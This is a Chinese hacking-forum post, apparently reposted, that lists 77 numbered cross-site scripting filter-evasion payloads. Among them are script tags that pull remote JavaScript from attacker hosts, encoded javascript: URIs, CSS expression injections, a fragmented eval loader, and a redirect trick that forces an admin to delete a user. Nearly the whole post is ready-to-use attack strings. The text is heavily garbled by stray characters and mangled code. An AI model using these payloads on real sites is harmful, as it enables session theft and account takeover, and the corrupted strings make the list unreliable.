貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
9 X1 G$ x- n$ M' C(1)普通的XSS JavaScript注入
8 T5 u1 H C- o" r+ o$ c<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 z5 y$ \: y6 T" }6 k4 E
(2)IMG标签XSS使用JavaScript命令
' ?; N: p8 i5 e+ X<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: u4 f; u7 n7 m2 r5 K4 {
(3)IMG标签无分号无引号
, ~7 h. j A+ O1 Y# X, e- z. [3 J! g<IMG SRC=javascript:alert(‘XSS’)>1 q/ e) X% x- z# R) s; H
(4)IMG标签大小写不敏感7 Y" P# p' N$ W0 K
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 Z( J% l( Q \$ b6 @- v @% w' V: M(5)HTML编码(必须有分号)4 Y$ L2 L/ `! \# X0 F5 A
<IMG SRC=javascript:alert(“XSS”)>
% U0 r7 s6 Y- B% M) M(6)修正缺陷IMG标签$ S& M5 x+ S3 y, Q* b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ O( l; O, Z6 C) w2 c
3 S4 S6 }! A+ k+ }+ r
: Q; F8 C; ?4 A# r5 t# r4 `) j(7)formCharCode标签(计算器)1 H9 R# h# |5 F, a) Z2 N* \+ T
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) o% Z s' Y8 u' u( p* ^(8)UTF-8的Unicode编码(计算器): t$ a, C: Z& n4 B$ A1 |; c
<IMG SRC=jav..省略..S')>
/ i2 t* b k1 H(9)7位的UTF-8的Unicode编码是没有分号的(计算器); w5 Z/ H' ? X4 C+ E
<IMG SRC=jav..省略..S')>4 R" p" h! _+ l6 M1 W' _. \# P
(10)十六进制编码也是没有分号(计算器)
* y- F5 \6 ^. r V, t<IMG SRC=java..省略..XSS')>
8 I( H& u3 e7 Y; b; f+ Q# C: I+ D(11)嵌入式标签,将Javascript分开
. {( W- L6 D' u. }& K7 c. e) X<IMG SRC=”jav ascript:alert(‘XSS’);”>* F. j2 z, x! C f/ L' \, s
(12)嵌入式编码标签,将Javascript分开0 g' g w# F: B- a& p. }
<IMG SRC=”jav ascript:alert(‘XSS’);”>* S$ ?* k8 @# b2 n+ O5 C
(13)嵌入式换行符
e% }' R6 C$ }" B2 z<IMG SRC=”jav ascript:alert(‘XSS’);”>/ _6 ~8 n3 \. v! @) Q# k2 P3 N
(14)嵌入式回车7 F' l$ Y+ c: n- ]# `3 f: L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 Z0 e, D5 q. H; W/ N(15)嵌入式多行注入JavaScript,这是XSS极端的例子, l: i# U6 i; r; m
<IMG SRC=”javascript:alert(‘XSS‘)”>! t+ v4 Y: A. z+ G
(16)解决限制字符(要求同页面)
, r; ?6 M! |6 G" ~" u+ n<script>z=’document.’</script>: P: \7 @! W% Q S {
<script>z=z+’write(“‘</script>
* x6 w8 y* ?( c<script>z=z+’<script’</script>
& A% n& r! U6 H) b0 I# T<script>z=z+’ src=ht’</script>+ a: B6 [/ t, p) d8 ^* S
<script>z=z+’tp://ww’</script>
! D/ p0 g% |8 n3 k$ r" K3 g: Y<script>z=z+’w.shell’</script>
8 d% ]1 C( o* I& \5 @<script>z=z+’.net/1.’</script>2 ~$ M( ~6 y0 i& S. g0 E. E- M
<script>z=z+’js></sc’</script>
+ w7 f7 F3 o3 q) t7 T& N* s8 q, Y- n<script>z=z+’ript>”)’</script>% ^9 D5 {; A& Z" j! ^
<script>eval_r(z)</script>
2 @4 q; O2 F X m Z(17)空字符12-7-1 T00LS - Powered by Discuz! Board
' `1 f$ R2 V! E7 v8 S/ ohttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
2 y4 F: i, o$ r- C2 Tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& F+ q8 Q a5 Y: {
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, x+ Z, }! W7 P. z5 \* m$ r* t+ t" V
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ K9 Q9 f' O7 G* k/ c7 J
(19)Spaces和meta前的IMG标签/ h2 }; N1 a0 z3 h
<IMG SRC=” javascript:alert(‘XSS’);”>7 D8 l$ Q6 N+ U% S" h: G, A. [
(20)Non-alpha-non-digit XSS
& e6 C+ U' e5 P v' y! E<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
U; r" c; k' M+ ^7 N" K(21)Non-alpha-non-digit XSS to 2
3 Y J2 P, Z9 ~! w1 g S8 x<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 e/ P0 b: U6 [
(22)Non-alpha-non-digit XSS to 3- q1 n/ E+ Y: v4 m+ `
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% K6 z) d; V9 f5 Y: `! e( [: ](23)双开括号
8 v6 M+ b" m0 A- Y+ e<<SCRIPT>alert(“XSS”);//<</SCRIPT> @8 e9 O" d# O9 ]' `
(24)无结束脚本标记(仅火狐等浏览器)
x% `) x" P2 W& x# o, g' p0 s<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
' I2 q' C8 Y" j) Z(25)无结束脚本标记2
" \4 l) V ]" ~( W: y8 E% n<SCRIPT SRC=//3w.org/XSS/xss.js>& c5 L# U# M/ A0 x, i
(26)半开的HTML/JavaScript XSS2 _: V; w' S: @% g: ~9 q4 u
<IMG SRC=”javascript:alert(‘XSS’)”
2 }0 M; `9 z& v a; f(27)双开角括号
( G4 s ]4 _& N4 Z& g& [<iframe src=http://3w.org/XSS.html <' X s$ w% y( S+ W a/ j
(28)无单引号 双引号 分号
- T6 ]1 q! S Z3 ^: y8 T3 k<SCRIPT>a=/XSS/9 c9 E, p6 Y1 i) x8 J: ]
alert(a.source)</SCRIPT>0 X* M) r( F: l5 D5 ^
(29)换码过滤的JavaScript
1 H. ]8 p8 G- T6 z\”;alert(‘XSS’);//
# v8 @7 b$ M( F* c3 t(30)结束Title标签1 U% W# y( b- S5 `: d, k. x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' T! D/ N8 [: V6 u% k$ _(31)Input Image0 w2 Z2 ]# }0 k2 S4 p
<INPUT SRC=”javascript:alert(‘XSS’);”>" k: w# d2 P9 P8 g$ m1 T
(32)BODY Image
5 c" Y2 H& f1 A5 [. }# Y P<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 a5 d( b1 X5 s8 e7 |(33)BODY标签5 v" s- P& U( s2 D# ?( \. D
<BODY(‘XSS’)>
+ y$ C" G# n# Z' H(34)IMG Dynsrc
: z" f# M" L9 r" d<IMG DYNSRC=”javascript:alert(‘XSS’)”>- `7 B, e4 V5 {7 m3 F% Z s; t
(35)IMG Lowsrc
! u, {* P: ]+ l2 A* \3 v t% \<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 T/ a/ ]4 b4 \; X8 p4 y3 Z! G2 ~(36)BGSOUND1 L0 m7 P8 R1 [3 O0 T% `& M
<BGSOUND SRC=”javascript:alert(‘XSS’);”>6 r: k, D. e I" ?1 K
(37)STYLE sheet* {3 o. D+ c, v3 U3 X E+ \
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>8 \- c/ K, n% \8 t- a
(38)远程样式表- {5 b7 {% G9 ?( l4 e
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( O \ e5 a& L. P) W6 H' Y6 K(39)List-style-image(列表式)5 q6 `1 X) h" Q; F
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 J( s8 M2 M- G% u( M6 A$ ], b
(40)IMG VBscript& y" b! Z# b1 h! I
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS' `1 D9 w* B; }2 h
(41)META链接url5 |: \. A7 ~# D1 X0 J! C
; i' [* N8 r k) A3 l1 j! s1 t
) P& k0 M. s7 q4 G* b6 p<META HTTP-EQUIV=”refresh” CONTENT=”0;
+ I# O) ~. z! ?URL=http://;URL=javascript:alert(‘XSS’);”>
: ~/ K, l( o' o$ x i* v4 e! m% {& t(42)Iframe8 P* c' n r& d- C
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 u6 l6 P0 Z) Y4 j* W(43)Frame
# ]4 ?2 n" }# N# g<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
$ i% Y4 \' p) c @7 nhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
& X) S/ L% ^" Z(44)Table
- Y3 {! R8 m4 R5 e y3 M<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 E+ \& {9 n* v3 Q" N, \0 D( o
(45)TD
; o$ |& D( ~' w: Y. B<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% ]$ c2 k8 A" N4 A(46)DIV background-image
) w/ s/ t, O% S; F4 F) P* h, Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ Q5 |6 X7 H! F( u3 g5 c1 t2 e& l(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-' ]$ w+ X+ d5 D; X
8&13&12288&65279)8 J3 \8 u* U2 E/ ^
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% [; m$ O$ T* M7 \" q$ ~+ x1 W
(48)DIV expression7 Y* z) }! ~) u4 w( N. P
<DIV STYLE=”width: expression_r(alert(‘XSS’));”> X6 w( n. w; f+ G$ d! t
(49)STYLE属性分拆表达. W( j% ^9 V9 A+ H( [/ W+ K
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# a9 z: Z/ h5 N5 b& y. ^, x* G(50)匿名STYLE(组成:开角号和一个字母开头)+ t, @! K, e! G6 S
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 M$ I7 c/ K: f1 z
(51)STYLE background-image
- v t- i/ p) t( A: u, u" n A<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A1 g8 g# d9 _: U& e
CLASS=XSS></A>
0 ?% f, m3 x5 \, x$ b(52)IMG STYLE方式4 D3 `, {0 @; X( Q/ e
exppression(alert(“XSS”))’>
3 Q& x7 w/ `' h- Q3 |7 W7 a) Y(53)STYLE background" H+ a/ H$ q+ Q9 Y, d3 @
<STYLE><STYLE4 v4 i9 n" q. W% ~. M' O
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) P& l6 k5 u8 J+ H# y(54)BASE9 V; r: \/ ?/ n# z. V. n! E! w
<BASE HREF=”javascript:alert(‘XSS’);//”>% c7 A, @* E8 z4 n
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) _0 b' S7 t6 k4 f/ C
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, E$ G" B/ G* I+ o8 S(56)在flash中使用ActionScrpt可以混进你XSS的代码+ O0 @6 p6 x6 f5 `( K7 K
a=”get”;* j7 W& D% ~6 b+ d
b=”URL(\”";
! B I/ p, [' j$ ac=”javascript:”;
3 N( J0 b9 U. T- @7 @d=”alert(‘XSS’);\”)”;
' [6 P$ N$ c" Y: N2 c0 b* Q- ]+ Weval_r(a+b+c+d);
& C9 h+ c- O( W/ o7 T9 p- `' u(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% H& [& T5 m; h9 b6 r% |; i<HTML xmlns:xss>
% s4 }4 r! H2 G4 L8 [* {, z( ]) J<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 E- U8 @8 [, Y n* t0 ^" W
<xss:xss>XSS</xss:xss>
& X2 H: S4 e- L K; B</HTML>1 ?) K3 o& \& t( X4 A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
+ s: \6 M) t! @- s<SCRIPT SRC=””></SCRIPT>1 W+ ]% k9 _/ [6 g. a3 k4 B
(59)IMG嵌入式命令,可执行任意命令
3 x0 C9 t {+ R* K; b% I<IMG SRC=”http://www.XXX.com/a.php?a=b”>
) ?3 H2 U3 q1 m" V- t(60)IMG嵌入式命令(a.jpg在同服务器)& U" ?/ p; z" Z( | N
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser: O5 m5 u/ | J# t- U
(61)绕符号过滤
* I; \; E: |$ B) I<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ d0 F$ t- F9 t1 k4 p(62)
2 z1 \2 C0 T' N& g$ J N8 s<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 }5 @; X {- g8 G# p
(63)% } a5 F' V& i
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
0 w7 m0 ]; Q9 q% c- o$ e6 n) b(64)/ G# _. b3 O2 w, o8 w! ]* o
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) a+ @8 I( J7 r' x(65)
8 p* X6 {! ~2 s9 Y) Q<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ j- S1 J" @" i(66)12-7-1 T00LS - Powered by Discuz! Board% }! d1 O5 b9 b* K- W( F
https://www.t00ls.net/viewthread ... table&tid=15267 4/62 C: Y3 r3 x& s( I, ~
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& U( w$ ]. M( u9 e
(67)# s8 s8 _, f3 y" r
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
! P* D% F. B# z: R3 @7 _- f</SCRIPT>
- m* t u% K* H. `(68)URL绕行: i+ ~' C: V0 A% _( ~
<A HREF=”http://127.0.0.1/”>XSS</A>0 V) y' ~1 V' t" E, X" r
(69)URL编码
9 f. R7 `! N9 F! F- Q+ A! A<A HREF=”http://3w.org”>XSS</A>; [* |2 E8 _ \/ m% y/ D# ?
(70)IP十进制
7 H6 E2 r6 }" q7 i. X<A HREF=”http://3232235521″>XSS</A>6 t5 F: B" T) s3 h' t$ z6 ~0 g
(71)IP十六进制
# D; K* C: D& J* | ^$ }<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ n( ^& A; c3 ?) Q+ k(72)IP八进制6 F9 n# n+ v ?
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ e S: s' T" |# ]" U(73)混合编码
3 @1 B, W# U" a o S0 L% h<A HREF=”h
' S7 B) S d' z7 Z4 Ett p://6 6.000146.0×7.147/”">XSS</A>
5 c. b, s; {. ~2 n(74)节省[http:]% h( Q( o- ~% N! [. s) k: J
<A HREF=”//www.google.com/”>XSS</A>
2 w0 ^# t! p6 z7 J. _(75)节省[www]$ n. v) X+ ?1 y; b0 d! P
<A HREF=”http://google.com/”>XSS</A>
& [, w& z0 p. P5 x9 S(76)绝对点绝对DNS
8 A e# D, n7 l9 u/ w# @<A HREF=”http://www.google.com./”>XSS</A># d2 J/ t$ ` D7 _5 [5 o$ n
(77)javascript链接
1 p+ g) b2 r7 Z! X0 v2 p; I<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>5 j+ E5 {) e+ X; @
' T, X, `% P( ~ B: r; G7 H3 C
原文地址:http://fuzzexp.org/u/0day/?p=14
' ^5 k) L6 V0 p$ x# y; t: K: z* L8 [" @
|
发表于 2013-4-19 19:22:37
收藏
支持
反对